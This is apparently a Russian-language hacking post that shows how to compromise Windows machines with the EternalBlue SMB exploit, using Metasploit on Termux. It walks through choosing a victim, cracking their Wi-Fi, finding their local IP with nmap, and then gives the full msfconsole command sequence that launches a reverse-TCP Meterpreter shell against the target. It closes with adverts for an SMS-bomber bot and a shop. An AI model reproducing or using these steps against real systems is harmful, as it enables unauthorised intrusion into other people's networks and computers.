EternalBlue - Эксплуатация Windows PC
ٖٜٖٜٖٜ༽⃚⃙ٖٖٜٖٖٜٖٜٖٜٖ᷍⃟⃖⃗༼ٖٜٖٜٖ ǤŁäᗫσᏕS
//
Содержание:
• История создания
• Установка
• Теория
• Практика
И снова, здрасте !
В этой статье речь пойдёт, о Metasploit и прилегающиго к нему эксплоите - EternalBlue
EternalBlue - кодовое имя эксплойта, эксплуатирующего компьютерную уязвимость в Windows-реализации протокола SMB, к разработке которого, как считается, причастно Агентство национальной безопасности (США). Секретные сведения об уязвимости и исполняемый код эксплойта были опубликованы хакерской группой The Shadow Brokers 14 апреля 2017 года. Уязвимость была использована при распространении вредоносного ПО WannaCry в мае 2017 года. В этой статье я бы хотел обратить на него внимание, и попробовать в действии.
В последней версии Metasploit Framework присутствует, необходимый нам, для этого модуль.
А самое главное этот модуль можно спокойно юзать через Termux, не нося ссобой тяжелый ноут.
Утановка Metasploit:
apt update
apt upgrade
pkg install unstable-repo
pkg install metasploit
Немного теории:
Как вообще-то производится взлом ?)
Для начала хуцкер ищет свою потонцеальную жертву ( Windows 7>)
Затем производится взлом Wi-Fi точки на которой сидит жертва.
После удачного взлома Wi-Fi сеть сканируется при помощи nmap или fing тем самым вычесляется локальный ip адрес жертвы.
Ну вот и все, это все данные которые нужны для взлома..)
От теории к практике !
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhost (ip адрес атакуемого)
set lhost (ваш ip адрес)
set payload windows/x64/meterpreter/reverse_tcp
exploit
При удачном взломе появится такая картина:
SMS Bomber - @freesmsbomberbyyan4ik_bot
Наш магазин - @CanDly_Shop_bot
Наш чат: 👇 https://t.me/joinchat/OfS7AkvuaTCAcM_WrUkCQw